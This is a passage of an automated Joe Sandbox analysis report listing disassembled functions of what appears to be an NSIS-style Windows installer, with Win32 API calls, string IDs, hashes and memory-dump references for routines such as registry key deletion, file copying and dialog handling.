                                                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                          Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                          • wsprintfW.USER32 ref: 00404457
                                                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s$@rD
                                                                          • API String ID: 3540041739-1813061909
                                                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                          Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: *?|<>/":
                                                                          • API String ID: 589700163-165019052
                                                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                          Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Close$DeleteEnumOpen
                                                                          • String ID:
                                                                          • API String ID: 1912718029-0
                                                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                          Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                          • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                          Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                          Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          Strings
                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                          • API String ID: 1697273262-1764544995
                                                                          • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                          • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                          Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 00404902
                                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID: $@rD
                                                                          • API String ID: 3748168415-881980237
                                                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                          Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                          • API String ID: 2577523808-3778932970
                                                                          • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                          • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                          Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcatwsprintf
                                                                          • String ID: %02x%c$...
                                                                          • API String ID: 3065427908-1057055748
                                                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                          Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                          • API String ID: 2266616436-4211696005
                                                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                          Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00402100
                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                          • String ID:
                                                                          • API String ID: 1599320355-0
                                                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                          Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                          • String ID: Version
                                                                          • API String ID: 512980652-315105994
                                                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                          Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                          • String ID:
                                                                          • API String ID: 2102729457-0
                                                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                          Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                          • String ID:
                                                                          • API String ID: 2883127279-0
